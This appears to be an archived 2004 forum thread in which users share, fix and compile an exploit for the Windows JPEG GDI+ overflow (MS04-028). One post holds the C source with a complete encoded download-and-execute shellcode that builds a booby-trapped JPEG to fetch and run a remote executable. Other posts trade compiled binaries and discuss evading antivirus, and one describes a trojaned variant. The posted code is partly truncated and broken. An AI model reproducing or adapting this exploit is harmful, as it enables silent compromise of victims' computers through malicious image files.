/* it is the marker for end of jpeg image*/ fprintf(fout,"\xFF\xD9");
fclose(fout);
printf("The Jpeg Server, has been created.with your settings.\n"); return 0; }
Xion
Sep 25 2004, 09:40 PM
i have a error whit line > char *newshellcode = new char[sizeof(shellcode)+strlen(argv[1])+1];
rscience
Sep 25 2004, 11:02 PM
c.c:164:24: missing terminating " character c.c: In function `main': c.c:165: error: parse error before "Security" c.c:165: error: stray '\' in program c.c:165: error: stray '\' in program c.c:165:28: missing terminating " character c.c:168:24: missing terminating " character c.c:169: error: `OutputPath' undeclared (first use in this function) c.c:169: error: (Each undeclared identifier is reported only once c.c:169: error: for each function it appears in.) c.c:169: error: stray '\' in program c.c:169: error: stray '\' in program c.c:169: error: `r' undeclared (first use in this function) c.c:169: error: parse error before "n" c.c:169: error: stray '\' in program c.c:169: error: stray '\' in program c.c:169:21: missing terminating " character c.c:170:24: missing terminating " character c.c:171: error: stray '\' in program c.c:171:12: missing terminating " character c.c:176: error: `new' undeclared (first use in this function) c.c:176: error: parse error before "char" c.c:214:2: warning: no newline at end of file
FIX THIS !!!
tibbar
Sep 25 2004, 11:16 PM
what is wrong with you ppl!!!
compiled in 5 minutes
[EDIT] Oh and rscience i dont like your attitude "FIX THIS!!!" Please ask more sensible questions like what do these errors mean, and how can i get past them.
rscience
Sep 25 2004, 11:43 PM
i was try to compiled this but still have thie same error. Tell me how you compiled this or what, program ?
thx for advance
tibbar
Sep 25 2004, 11:48 PM
i used vc6, in case you want to see the changes i made to get it to compile, see attached project.
Flowby
Sep 26 2004, 12:37 AM
Does it work?
Flowby
Sep 26 2004, 12:37 AM
does it work??
tibbar
Sep 26 2004, 12:41 AM
not tested it yet, im just compiling it for you guys! let me know if it does
Flowby
Sep 26 2004, 12:57 AM
not for me!!
none of this exploits work!!
belive me if it woud work...there woud alredy be a worm out!
blahplok
Sep 26 2004, 03:57 AM
use (Windows XP Prof SP 0 and Windows 2000 Prof SP 3) not work, any1 have lucky with this exploit?
Diablotic
Sep 26 2004, 07:34 AM
Rscience you didn't change at all. Compiled fine by me and tested... If you think how to use it you will get awesome results. Ave!
toska
Sep 26 2004, 09:11 AM
most AVs pick up the result of the jpg generator.....
Any ideas?
M4Z3R
Sep 26 2004, 11:09 AM
Well Lets See . . .
M4Z3R
Sep 26 2004, 11:14 AM
Here is the right source, however didn't try it to see if it worked; I made a few fixes, hope it RoX, Enjoy Here is the source working:
CODE
/* =============================================================== Windows JPEG GDI+ Overflow Download Shellcoded Exploit (MS04-028) Coded By ATmaCA Credit to eEye Digital Security,K-OTik Security,FoToZ,pathetic. E-Mail:atmaca@prohack.net Web:www.prohack.net =============================================================== */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <windows.h> /* Generic win32 http download shellcode You can put approx 2500 bytes of shellcode... But the shell code can not contain 0xFFh 0xD9 because it is the marker for end of jpeg image. */ char shellcode[]= "\xEB\x0F\x58\x80\x30\x17\x40\x81\x38\x6D\x30\x30\x21\x75\xF4" "\xEB\x05\xE8\xEC\xFF\xFF\xFF\xFE\x94\x16\x17\x17\x4A\x42\x26" "\xCC\x73\x9C\x14\x57\x84\x9C\x54\xE8\x57\x62\xEE\x9C\x44\x14" "\x71\x26\xC5\x71\xAF\x17\x07\x71\x96\x2D\x5A\x4D\x63\x10\x3E" "\xD5\xFE\xE5\xE8\xE8\xE8\x9E\xC4\x9C\x6D\x2B\x16\xC0\x14\x48" "\x6F\x9C\x5C\x0F\x9C\x64\x37\x9C\x6C\x33\x16\xC1\x16\xC0\xEB" "\xBA\x16\xC7\x81\x90\xEA\x46\x26\xDE\x97\xD6\x18\xE4\xB1\x65" "\x1D\x81\x4E\x90\xEA\x63\x05\x50\x50\xF5\xF1\xA9\x18\x17\x17" "\x17\x3E\xD9\x3E\xE0\xFE\xFF\xE8\xE8\xE8\x26\xD7\x71\x9C\x10" "\xD6\xF7\x15\x9C\x64\x0B\x16\xC1\x16\xD1\xBA\x16\xC7\x9E\xD1" "\x9E\xC0\x4A\x9A\x92\xB7\x17\x17\x17\x57\x97\x2F\x16\x62\xED" "\xD1\x17\x17\x9A\x92\x0B\x17\x17\x17\x47\x40\xE8\xC1\x7F\x13" "\x17\x17\x17\x7F\x17\x07\x17\x17\x7F\x68\x81\x8F\x17\x7F\x17" "\x17\x17\x17\xE8\xC7\x9E\x92\x9A\x17\x17\x17\x9A\x92\x18\x17" "\x17\x17\x47\x40\xE8\xC1\x40\x9A\x9A\x42\x17\x17\x17\x46\xE8" "\xC7\x9E\xD0\x9A\x92\x4A\x17\x17\x17\x47\x40\xE8\xC1\x26\xDE" "\x46\x46\x46\x46\x46\xE8\xC7\x9E\xD4\x9A\x92\x7C\x17\x17\x17" "\x47\x40\xE8\xC1\x26\xDE\x46\x46\x46\x46\x9A\x82\xB6\x17\x17" "\x17\x45\x44\xE8\xC7\x9E\xD4\x9A\x92\x6B\x17\x17\x17\x47\x40" "\xE8\xC1\x9A\x9A\x86\x17\x17\x17\x46\x7F\x68\x81\x8F\x17\xE8" "\xA2\x9A\x17\x17\x17\x44\xE8\xC7\x48\x9A\x92\x3E\x17\x17\x17" "\x47\x40\xE8\xC1\x7F\x17\x17\x17\x17\x9A\x8A\x82\x17\x17\x17" "\x44\xE8\xC7\x9E\xD4\x9A\x92\x26\x17\x17\x17\x47\x40\xE8\xC1" "\xE8\xA2\x86\x17\x17\x17\xE8\xA2\x9A\x17\x17\x17\x44\xE8\xC7" "\x9A\x92\x2E\x17\x17\x17\x47\x40\xE8\xC1\x44\xE8\xC7\x9A\x92" "\x56\x17\x17\x17\x47\x40\xE8\xC1\x7F\x12\x17\x17\x17\x9A\x9A" "\x82\x17\x17\x17\x46\xE8\xC7\x9A\x92\x5E\x17\x17\x17\x47\x40" "\xE8\xC1\x7F\x17\x17\x17\x17\xE8\xC7\xFF\x6F\xE9\xE8\xE8\x50" "\x72\x63\x47\x65\x78\x74\x56\x73\x73\x65\x72\x64\x64\x17\x5B" "\x78\x76\x73\x5B\x7E\x75\x65\x76\x65\x6E\x56\x17\x41\x7E\x65" "\x63\x62\x76\x7B\x56\x7B\x7B\x78\x74\x17\x48\x7B\x74\x65\x72" "\x76\x63\x17\x48\x7B\x60\x65\x7E\x63\x72\x17\x48\x7B\x74\x7B" "\x78\x64\x72\x17\x40\x7E\x79\x52\x6F\x72\x74\x17\x52\x6F\x7E" "\x63\x47\x65\x78\x74\x72\x64\x64\x17\x40\x7E\x79\x5E\x79\x72" "\x63\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x56" "\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x42\x65" "\x7B\x56\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x45\x72\x76\x73" "\x51\x7E\x7B\x72\x17\x17\x17\x17\x17\x17\x17\x17\x17\x7A\x27" "\x27\x39\x72\x6F\x72\x17" "m00!";
char newshellcode[1024]; //= char[sizeof(shellcode)+strlen(argv[1])+1]; unsigned int i=0,j=0;
int main(int argc, char *argv[]) { FILE *fout;
if (argc < 3) {
printf("\r\nJpeg Downloader V1.0 Console\r\n", argv[0]); printf("FixeD By M4Z3R, For GSO\r\n"); printf("Credits and Greetings Go To:\r\n"); printf("Coded By ATmaCA\r\n"); printf("Credit to eEye Digital Security,K-OTik Security,FoToZ,pathetic\r\n"); printf("E-Mail:atmaca@prohack.net\r\n"); printf("Web:www.prohack.net\r\n\r\n"); printf("Usage:\r\n%s <DownloadUrl> <OutputPath>\r\n\r\n",argv[0]); printf("Example:%s http://www.yoursite.com/server.exe mypic.jpg\n", argv[0]);
/* it is the marker for end of jpeg image*/ fprintf(fout,"\xFF\xD9");
fclose(fout);
printf("The Jpeg Server, has been created.with your settings.\n"); return 0; }
Cheers, M4Z3R
chris105
Sep 26 2004, 11:21 AM
Could AV be using this \xFF\xD9 to detect it or would that detect all jpg files as exploits ?
M4Z3R
Sep 26 2004, 11:28 AM
Well, if AV detects ' \xFF\xD9' as a malicious string, I think it would block any jpg file, since jpg file end with this offset. I'm interresed on how they detect worms and stuff, if anyone could help, it would be appreciated.
Cheers, M4Z3R
extreme
Sep 26 2004, 11:32 AM
I read on a forum named Shadowcrew that ATMACA exploit has a trojan embbed inside it... And here are the removal instruction to check: 0) boot in safe mode 1) remove key "COM Service" from: HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run and from HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Ru 2) delete file: C:\WINDOWS\msagent\mssyeb.pif (hidden file)
M4Z3R
Sep 26 2004, 11:33 AM
What the heck are you talking about dude? I don't get it . . .
tibbar
Sep 26 2004, 12:04 PM
well whatever the new one does, here's it compiled.
rscience
Sep 26 2004, 12:13 PM
NOW .......................... i have COMPILED and its working !!!!!! ...... I hate SHIT Sources....
nuorder
Sep 26 2004, 12:15 PM
QUOTE (rscience @ Sep 26 2004, 10:13 PM)
NOW .......................... its working ...... I hate SHIT Sources....
why? i think its good that someone makes an effort to write the code in the first place rather than relying on others to do the work for them
tibbar
Sep 26 2004, 12:24 PM
"shit sources" is otherwise known as n00b protection
M4Z3R
Sep 26 2004, 12:31 PM
Lol yeah, and We finally distribute it to the n00bs Shall we keep on doing this
Cheers , M4Z3R
extreme
Sep 26 2004, 01:45 PM
About the trojan stuff I was talking about.. There is a widelly spreaded version of exactly this exploit...
QUOTE
/* =============================================================== Windows JPEG GDI+ Overflow Download Shellcoded Exploit (MS04-028) Coded By ATmaCA Credit to eEye Digital Security,K-OTik Security,FoToZ,pathetic. E-Mail:atmaca@prohack.net Web:www.prohack.net =============================================================== */
...but someone replaced shellcode with a webdownloader or trojan, don't know for sure.. Anyway, as victims report, it is very difficult to spot the trojan cause it possiblly has some rootkit functions.. I say possibly, cause I have not tested myself.. And I have put removal instructions, so you can check yourself if you bumped into that version of exploit... And since I am against posting compiling exploits, it is possible that one of these attachments is what I am talking about..
arn0ld
Sep 26 2004, 01:59 PM
i didn't understand what's the <DownloadUrl> which i'm supposed to insert there...
M4Z3R
Sep 26 2004, 02:44 PM
Extreme, Don't be paranoid, the shellcode in this JPEG exploit version, it for downloading from a HTPP server. Stop scaring people by saying stupid non sence stories, thx
Extreme, Don't be paranoid, the shellcode in this JPEG exploit version, it for downloading from a HTPP server. Stop scaring people by saying stupid non sence stories, thx
well, from what it sounds like he is saying there is a modified compiled version that is floating around that has a trojan in it, and he isn't necessarily saying that all versions of the exploit have the trojan. will compile and fool with the exploit later.
Hellraiseruk
Sep 27 2004, 07:30 PM
thx for all the compiled versions but i think everyone question is, does this exploit work? can anyone tell us a deffinate anwser..cheerz
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Shall we keep on doing this 
